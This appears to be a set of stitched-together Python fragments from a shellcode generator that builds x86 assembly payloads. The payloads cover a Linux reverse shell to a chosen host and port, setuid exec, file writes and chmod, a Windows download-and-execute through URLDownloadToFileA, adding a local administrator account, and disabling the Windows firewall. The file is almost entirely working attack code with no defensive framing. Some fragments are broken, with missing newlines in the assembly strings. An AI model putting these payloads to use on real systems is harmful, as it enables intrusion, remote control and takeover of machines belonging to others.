def generate(self):
null = len(self.target_file) % 4
if null != 0:
null = ''
else:
null = 'xor %ebx, %ebx\npush %ebx\n'
payload = "push $0x5\n"
payload += "pop %eax\n"
payload += null
payload += stack.generate(str(self.target_file), '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "push $0x4014141\n"
payload += "pop %ecx\n"
payload += "shr $0x10, %ecx\n"
payload += "int $0x80\n"
payload += "mov %eax, %ebx\n"
payload += "push $0x4\n"
payload += "pop %eax\n"
payload += stack.generate(str(self.content), '%ecx', 'string')
payload += "mov %esp, %ecx\n"
payload += stack.generate(str(len(self.content)), '%edx', 'int')
payload += "int $0x80\n"
payload += "mov $0x1, %al\n"
payload += "mov $0x1, %bl\n"
payload += "int $0x80\n"
return payload
def generate(self):
payload = "push $0x0f\n"
payload += "pop %eax\n"
payload += stack.generate(self.permission, '%ecx', 'int')
payload += stack.generate(self.target_file, '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "int $0x80\n"
payload += "mov $0x01, %al\n"
payload += "mov $0x01, %bl\n"
payload += "int $0x80\n"
return payload
def run(data):
command = data[0]
if command.find(" ") >= 0:
command = command.replace('[space]', ' ')
if int(len(command)) < 5:
command = str(
command
) + '[space]&&[space]echo[space]1[space]>[space]/dev/null' # bypass a bug in here, fix later
# bug in line 12 & 13, check later
return sys(
stack.generate(command.replace('[space]', ' '), '%ecx', 'string'))
else:
return sys(stack.generate(command, '%ecx', 'string'))
def generate(self):
payload = "push $0xb\n"
payload += "pop %eax\n"
payload += "cltd\n"
payload += "push %edx\n"
payload += stack.generate(self.command, '%ecx', 'string')
payload += "mov %esp, %esi\n"
payload += "push %edx\n"
payload += "push $0x632d9090\n"
payload += "pop %ecx\n"
payload += "shr $0x10, %ecx\n"
payload += "push %ecx\n"
payload += "mov %esp, %ecx\n"
payload += "push %edx\n"
payload += "push $0x68\n"
payload += "push $0x7361622f\n"
payload += "push $0x6e69622f\n"
payload += "mov %esp, %ebx\n"
payload += "push %edx\n"
payload += "push %edi\n"
payload += "push %esi\n"
payload += "push %ecx\n"
payload += "push %ebx\n"
payload += "mov %esp, %ecx\n"
payload += "int $0x80\n"
return payload
def generate(self):
payload = "xor %%eax, %%eax"
payload += "push %%eax"
payload += stack.generate(self.file_dest, '%ebx', 'string')
payload += "mov %%esp, %%edx"
payload += stack.generate(self.perm, '%ecx', 'int')
payload += "push %%edx"
payload += "push $0xf"
payload += "pop %%eax"
payload += "push $0x2a"
payload += "int $0x80"
payload += "mov $0x01, %%al"
payload += "mov $0x01, %%bl"
payload += "int $0x80"
return payload
def generate(self):
payload = "mov $0x46, %al\n"
payload += "xor %ebx, %ebx\n"
payload += "xor %ecx, %ecx\n"
payload += "int $0x80\n"
payload += stack.generate(self.target_file, '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "xor %eax, %eax\n"
payload += "mov $0xb, %al\n"
payload += "int $0x80\n"
payload += "mov $0x1, %al\n"
payload += "mov $0x1, %bl\n"
payload += "int $0x80"
return payload
def generate(self):
payload = "mov $1, %bl\n"
payload += "push $0\n"
payload += "push $1\n"
payload += "push $2\n"
payload += "mov %esp, %ecx\n"
payload += "mov $0x66, %al\n"
payload += "int $0x80\n"
payload += f"push ${stack.ipv4_to_hex(self.lhost)}\n" # PUSH IP
if self.lport < 256:
payload += f"mov ${hex(self.lport)}, %bl\n" # MOV PORT
else:
payload += f"mov ${hex(self.lport)}, %bx\n" # MOV PORT
payload += "push %bx\n"
payload += "mov $0x2, %bl\n"
payload += "push %bx\n"
payload += "mov %esp, %ebx\n"
payload += "push $0x10\n"
payload += "push %ebx\n"
payload += "push %eax\n"
payload += "mov %esp, %ecx\n"
payload += "mov $0x3, %bl\n"
payload += "push %eax\n"
payload += "mov $0x66, %al\n"
payload += "int $0x80\n"
payload += "pop %ebx\n"
payload += "mov $0x2, %cl\n"
payload += "mov $0x3f, %al\n"
payload += "int $0x80\n"
payload += "dec %ecx\n"
payload += "mov $0x3f, %al\n"
payload += "int $0x80\n"
payload += stack.generate(self.shell, '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "xor %eax, %eax\n"
payload += "push %eax\n"
payload += "push %ebx\n"
payload += "mov %esp, %ecx\n"
payload += "xor %edx, %edx\n"
payload += "mov $0xb, %al\n"
payload += "int $0x80\n"
return payload
def run(self):
command = f"cmd.exe /c net user {self.username} {self.password} /add && " \
f"net localgroup administrators {self.username} /add "
print(
self.generate(stack.generate(command, "%ecx", "string"),
hex(int(8 + 4 * (ceil(len(command) / float(4)))))))
def generate(self):
payload = "xor %ecx, %ecx\n"
payload += "mov %fs:0x30(%ecx), %eax\n"
payload += "mov 0xc(%eax), %eax\n"
payload += "mov 0x14(%eax), %esi\n"
payload += "lods %ds:(%esi), %eax\n"
payload += "xchg %eax, %esi\n"
payload += "lods %ds:(%esi), %eax\n"
payload += "mov 0x10(%eax), %ebx\n"
payload += "mov 0x3c(%ebx), %edx\n"
payload += "add %ebx, %edx\n"
payload += "mov 0x78(%edx), %edx\n"
payload += "add %ebx, %edx\n"
payload += "mov 0x20(%edx), %esi\n"
payload += "add %ebx, %esi\n"
payload += "xor %ecx, %ecx\n"
payload += "inc %ecx\n"
payload += "lods %ds:(%esi), %eax\n"
payload += "add %ebx, %eax\n"
payload += "cmpl $0x50746547, (%eax)\n"
payload += "jne 23 <.text+0x23>\n"
payload += "cmpl $0x41636f72, 0x4(%eax)\n"
payload += "jne 23 <.text+0x23>\n"
payload += "cmpl $0x65726464, 0x8(%eax)\n"
payload += "jne 23 <.text+0x23>\n"
payload += "mov 0x24(%edx), %esi\n"
payload += "add %ebx, %esi\n"
payload += "mov (%esi, %ecx, 2), %cx\n"
payload += "dec %ecx\n"
payload += "mov 0x1c(%edx), %esi\n"
payload += "add %ebx, %esi\n"
payload += "mov (%esi, %ecx, 4), %edx\n"
payload += "add %ebx, %edx\n"
payload += "push %ebx\n"
payload += "push %edx\n"
payload += "xor %ecx, %ecx\n"
payload += "push %ecx\n"
payload += "mov $0x61636578, %ecx\n"
payload += "push %ecx\n"
payload += "subl $0x61, 0x3(%esp)\n"
payload += "push $0x456e6957\n"
payload += "push %esp\n"
payload += "push %ebx\n"
payload += "call *%edx\n"
payload += "add $0x8, %esp\n"
payload += "pop %ecx\n"
payload += "push %eax\n"
payload += "xor %ecx, %ecx\n"
payload += "push %ecx\n"
payload += stack.generate(self.target_file, "%ecx", "string")
payload += "xor %ebx, %ebx\n"
payload += "mov %esp, %ebx\n"
payload += "xor %ecx, %ecx\n"
payload += "inc %ecx\n"
payload += "push %ecx\n"
payload += "push %ebx\n"
payload += "call *%eax\n"
payload += f"add ${hex(int(8 + 4 * (ceil(len(self.target_file) / float(4)))))}, %esp\n"
payload += "pop %edx\n"
payload += "pop %ebx\n"
payload += "xor %ecx, %ecx\n"
payload += "mov $0x61737365, %ecx\n"
payload += "push %ecx\n"
payload += "subl $0x61, 0x3(%esp)\n"
payload += "push $0x636f7250\n"
payload += "push $0x74697845\n"
payload += "push %esp\n"
payload += "push %ebx\n"
payload += "call *%edx\n"
payload += "xor %ecx, %ecx\n"
payload += "push %ecx\n"
payload += "call *%eax\n"
return payload
def run(data):
file_to_exec = data[0]
return exc(stack.generate(file_to_exec, "%rcx", "string"), file_to_exec)
def generate(self):
payload = "xor %ecx, %ecx"
payload += "mov %fs:0x30(%ecx), %eax"
payload += "mov 0xc(%eax), %eax"
payload += "mov 0x14(%eax), %esi"
payload += "lods %ds:(%esi), %eax"
payload += "xchg %eax, %esi"
payload += "lods %ds:(%esi), %eax"
payload += "mov 0x10(%eax), %ebx"
payload += "mov 0x3c(%ebx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x78(%edx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x20(%edx), %esi"
payload += "add %ebx, %esi"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "lods %ds:(%esi), %eax"
payload += "add %ebx, %eax"
payload += "cmpl $0x50746547, (%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x41636f72, 0x4(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x65726464, 0x8(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "mov 0x24(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 2), %cx"
payload += "dec %ecx"
payload += "mov 0x1c(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 4), %edx"
payload += "add %ebx, %edx"
payload += "xor %esi, %esi"
payload += "mov %edx, %esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x41797261"
payload += "push $0x7262694c"
payload += "push $0x64616f4c"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += "mov $0x6c6c, %cx"
payload += "push %ecx"
payload += "push $0x642e6e6f"
payload += "push $0x6d6c7275"
payload += "push %esp"
payload += "call *%eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "mov $0x4165, %cx"
payload += "push %ecx"
payload += "push $0x6c69466f"
payload += "push $0x5464616f"
payload += "push $0x6c6e776f"
payload += "push $0x444c5255"
payload += "mov %esp, %ecx"
payload += "push %ecx"
payload += "push %eax"
payload += "call *%esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += stack.generate(self.url, "%ecx", "string")
payload += "xor %edi, %edi"
payload += "mov %esp, %edi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += stack.generate(self.filename, "%ecx", "string")
payload += "xor %edx, %edx"
payload += "mov %esp, %edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push %ecx"
payload += "push %edx"
payload += "push %edi"
payload += "push %ecx"
payload += "call *%eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x73736590"
payload += "pop %ecx"
payload += "shr $0x8, %ecx"
payload += "push %ecx"
payload += "push $0x636f7250"
payload += "push $0x74697845"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "call *%eax"
return payload
def run(self):
command = stack.generate(f"echo {self.data} > {self.file_dest}",
"%ecx", "string")
print(self.generate(command))
def run(self):
file_dest = stack.generate(self.dest_file, "%ecx", "string")
print(self.generate(file_dest))
def generate(self):
payload = "xor %ecx, %ecx"
payload += "mov %fs:0x30(%ecx), %eax"
payload += "mov 0xc(%eax), %eax"
payload += "mov 0x14(%eax), %esi"
payload += "lods %ds:(%esi), %eax"
payload += "xchg %eax, %esi"
payload += "lods %ds:(%esi), %eax"
payload += "mov 0x10(%eax), %ebx"
payload += "mov 0x3c(%ebx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x78(%edx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x20(%edx), %esi"
payload += "add %ebx, %esi"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "lods %ds:(%esi), %eax"
payload += "add %ebx, %eax"
payload += "cmpl $0x50746547, (%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x41636f72, 0x4(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x65726464, 0x8(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "mov 0x24(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 2), %cx"
payload += "dec %ecx"
payload += "mov 0x1c(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 4), %edx"
payload += "add %ebx, %edx"
payload += "push %ebx"
payload += "push %edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x4179726f"
payload += "push $0x74636572"
payload += "push $0x69446574"
payload += "push $0x61657243"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "add $0x10, %esp"
payload += "pop %ecx"
payload += "push %eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += stack.generate(self.dirname, "%ecx", "string")
payload += "xor %ebx, %ebx"
payload += "mov %esp, %ebx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push %ebx"
payload += "call *%eax"
payload += f"add ${hex(int(8 + 4 * (ceil(len(self.dirname) / float(4)))))}, %esp"
payload += "pop %edx"
payload += "pop %ebx"
payload += "xor %ecx, %ecx"
payload += "mov $0x61737365, %ecx"
payload += "push %ecx"
payload += "subl $0x61, 0x3(%esp)"
payload += "push $0x636f7250"
payload += "push $0x74697845"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "call *%eax"
return payload
def run(self):
command = "netsh firewall set opmode disable"
command = stack.generate(command, "%ecx", "string")
print(self.generate(command))